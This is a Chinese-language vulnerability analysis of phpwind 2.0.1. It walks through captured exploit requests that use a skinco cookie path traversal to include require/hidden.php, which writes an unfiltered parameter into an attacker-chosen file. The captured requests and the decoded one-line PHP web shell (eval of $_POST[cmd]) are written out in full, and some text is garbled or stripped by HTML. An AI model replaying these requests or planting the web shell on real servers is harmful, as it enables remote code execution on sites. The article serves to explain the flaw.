分析phpwind2.0.1漏洞

　　××（昵称在原文中已乱码）传给我一个phpwind2.0.1漏洞利用程序，可以直接在目录中写入一个木马。怎么说呢，这个漏洞是pinkeyes发现的，本文旨在分析这个漏洞的思路。直到发现这个漏洞是怎么产生的，我还在发虚汗中，同时pinkeyes 的睿智深深的感动了我，原来我才明白什么才是真正的技术含量。且听我慢慢道来：

　　在程序运行时，我抓了如下的包（注意：第一个请求里 tidwt= 后面的值很长，下面被折成了几行，它们都属于同一个 GET 请求）：

ããGET /phpwind/job.php?previewjob=preview&D_name=./attachment/set.php&tidwt=

ãã(chr(46).chr(47).chr(101).chr(114).chr(114).chr(111).chr(114).chr(46).chr(112).chr(104).chr(112),w),

ããchr(60).chr(63).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).

ããchr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(59).chr(63).chr(62))?> HTTP/1.1

ããContent-Type: text/html

ããCookie:skinco=../../require/hidden;

ããHost: www.5a609.com:81

ããAccept: text/html, */*

ããUser-Agent: Mozilla/3.0 (compatible; Indy Library)

ããGET /phpwind//attachment/set.php HTTP/1.1

ããContent-Type: text/html

ããCookie:skinco=../../require/hidden;

ããHost: www.5a609.com:81

ããAccept: text/html, */*

ããUser-Agent: Mozilla/3.0 (compatible; Indy Library)

　　chr()里的那些东西我查了一下ascii字符表，得到的是这样的：

　　?>　（注：解码结果本应显示在这里，但以 `<?` 开头的内容被 HTML 渲染当成标签吞掉了，只剩下结尾的 `?>`。按上面的 chr() 序列可以直接还原：第一组 `chr(46)…chr(112)` 是 `./error.php`，后面跟的 `w` 是以写模式打开该文件；第二组 `chr(60)…chr(62)` 是 `<? eval($_POST[cmd]);?>`，也就是要写进 error.php 的内容。）

　　很显然是在error.php里写入一行php木马！

　　所以关键是：

　　GET /phpwind/job.php?previewjob=preview&D_name=./attachment/set.php&tidwt= 中$D_name和$tidwt的出处。这两个东西很重要!于是我下了一个phpwind 2.0.1的程序看看，开始以为是job.php有问题。进入job.php中，只发现如下代码：

ããelseif($previewjob=='preview'){

ããrequire_once(R_P.'require/bbscode.php');

ããrequire_once(R_P.'header.php');

ããif (empty($skin)) $skin=$db_defaultstyle;

ããif (file_exists(R_P."data/style/$skin.php")){

ããinclude_once("data/style/$skin.php");

ãã}

　　好，在失望的同时也发现了$skin一定有问题，job.php文件头有个：require_once("./global.php");

　　接着我们来看看global.php里面的$skin参数吧：

ããif ($db_refreshtime!=0){

ããif('C:'.$REQUEST_URI==$lastpath && $onbbstime<$db_refreshtime){

ãã!$_COOKIE['winduid'] && $groupid='guest';

ãã$skin=$skinco ? $skinco : $db_defaultstyle;

ããShowmsg("refresh_limit");

ãã}

　　哦，只要我们定义了$skinco就可以满足$skin了!所以再找找$skinco吧，$skinco只有一处解释（其实并没有做任何过滤）：

ããif($skinco && file_exists(R_P."data/style/$skinco.php")){

ããCookie('skinco',$skinco);

　　呵呵，好轻松，只要存在就可以?这样只要构造一个cookie就完全可以实现。（注意：file_exists() 只回答"这个文件存不存在"，并不限制路径；$skinco 里的 `../` 会原样拼进 R_P."data/style/$skinco.php"，所以任何已存在的 .php 文件都能通过这个检查，随后被 include_once。）咦?$skinco我们好象哪里见过。果然，就是上面抓的包里面的：

ããCookie:skinco=../../require/hidden;

　　这样就更加证明我的思路是正确的，那……（此处几个字在原文中乱码，无法还原）。再不得不佩服这样精彩的思想，按照pinkeyes的思路，构造后应该是这样的：

ããdata/style/../../require/hidden.php

　　也就是./require/hidden.php。

　　这样也就是满足了job.php中的

ããif (file_exists(R_P."data/style/$skin.php")){

ããinclude_once("data/style/$skin.php");

　　到这里，先告一段落，我们回个头想想。我们分析这么多就是pinkeyes要为了包含一个文件：./require/hidden.php。这就奇怪了，为什么pinkeyes要千方百计的来包含 ./require/hidden.php呢?直接利用不可以吗?这个hidden.php到底是个什么样的文件呢?恩，下面的解释会让你有一个满意的答案。

　　我小心翼翼的打开hidden.php

　　（注：hidden.php 开头的 `<?php` 标签在此处被 HTML 渲染吞掉了；下面的代码从第一条语句开始。）

// hidden.php from phpwind 2.0.1, as quoted in the article: maintains the
// fixed-width "online users" record file.
// NOTE(review): this listing was pasted through HTML. The opening <?php tag is
// gone and the backslashes inside the strings were stripped -- the bare "t"
// and "n" below were evidently "\t" and "\n" (otherwise "$timestampt" would
// interpolate a variable named $timestampt, not $timestamp).
// Guard against direct requests: exit unless readover() is already defined,
// i.e. unless this file was reached through an include chain.
ãã!function_exists('readover') && exit('Forbidden');
// Build one online-user record as tab-separated fields. $tidwt, $fidwt,
// $D_name etc. are taken from the including script's variable scope; nothing
// in this file validates them. The article's request (above) supplies D_name
// and tidwt as GET parameters, which is how attacker-chosen text ends up here.
ãã$newonline="<>t$timestampt$onlineipt$fidwtt$tidwtt$groupidt$wherebbsyout$acttimet$uidt$windidt";
// Fixed-width record: pad to $db_olsize so a row can be replaced in place.
ãã$newonline=str_pad($newonline,$db_olsize)."n";
// Read the online file named by $D_name. The path is R_P.$D_name with no
// check that it stays under a fixed directory -- whatever the caller set is
// read here and written below.
ãã$onlineuser=readover(R_P.$D_name);
// Existing record for this user (tab-delimited $windid)? A match at offset 0
// would count as "not found" because of the assignment-in-condition; the "<>"
// prefix on every record means that cannot happen in practice.
ããif($offset=strpos($onlineuser,"t".$windid."t")){
ãã$inselectfile='N';
// Walk back to the newline that starts this record's line, then step past it.
ãã$offset=strpos($onlineuser,"n",$offset-$db_olsize);$offset+=1;/* original comment (garbled in source), roughly: after optimisation no conversion is needed at the start */
// Overwrite the existing record at that offset (writeinline: presumably a
// write-at-offset helper; defined elsewhere -- confirm).
ããwriteinline(R_P.$D_name,$newonline,$offset);
// Otherwise reuse the first blank (space-padded) slot ...
ãã}elseif($offset=strpos($onlineuser,str_pad(' ',$db_olsize)."n")){
ããwriteinline(R_P.$D_name,$newonline,$offset);
ãã}else{
// ... or append a new record ("ab" reads like an fopen append mode -- confirm
// against writeover()'s definition). All three branches write $newonline, and
// with it $tidwt, into the file selected by $D_name.
ããwriteover(R_P.$D_name,$newonline,"ab");
ãã}
ãã?>

　　看到这里，所有的疑团都解开了!

　　1.原来文件头多了个

ãã!function_exists('readover') && exit('Forbidden'); // direct HTTP access exits here; the rest of hidden.php only runs when it is included after readover() has been defined

　　这样直接访问是不允许的，后面的代码也不会执行，这样我明白pinkeyes要多走弯路来努力用include来包含这个文件：通过 $skinco 的目录穿越让 job.php 去 include 它，readover() 此时已经定义，这道检查就过了。

　　2 这个文件里有writeline()是可以写入木马的。$newonline正好也定义了$tidwt，所以最后的writeline()把$tidwt也写进去了。（按上面的代码，实际写文件的是 writeinline() 和 writeover()；三个分支都把包含 $tidwt 的 $newonline 写到 R_P.$D_name 指定的文件，而 $D_name 和 $tidwt 都没有任何过滤。）

　　写入到了D_name 所定义的set.php这个临时文件里。本来这样就可以写入一个小木马了，只要使$tidwt为编码，就可以的。但是可能是pinkeyes考虑到set.php里的东西比较乱（木马前后会夹着 $newonline 其余的字段），所以煞费苦心的用

　　?>　（注：这里的 `<? … ?>` 代码同样被 HTML 渲染吞掉，只剩 `?>`；它应即上面抓包中 tidwt 参数里用 chr() 编码的那段代码——以写模式打开 ./error.php 并写入 `<? eval($_POST[cmd]);?>`。）

　　写入一个更简单的木马到error.php里!这样才多了我们抓的第二个包（访问 set.php 触发其中的代码，从而生成 error.php）：

ããGET /phpwind//attachment/set.php HTTP/1.1

ããããããããããã

　　后记：我感觉自己写侦探小说还不错，是吧，哈。。。。

 

（本文由责任编辑 pasu 整理发布）

 
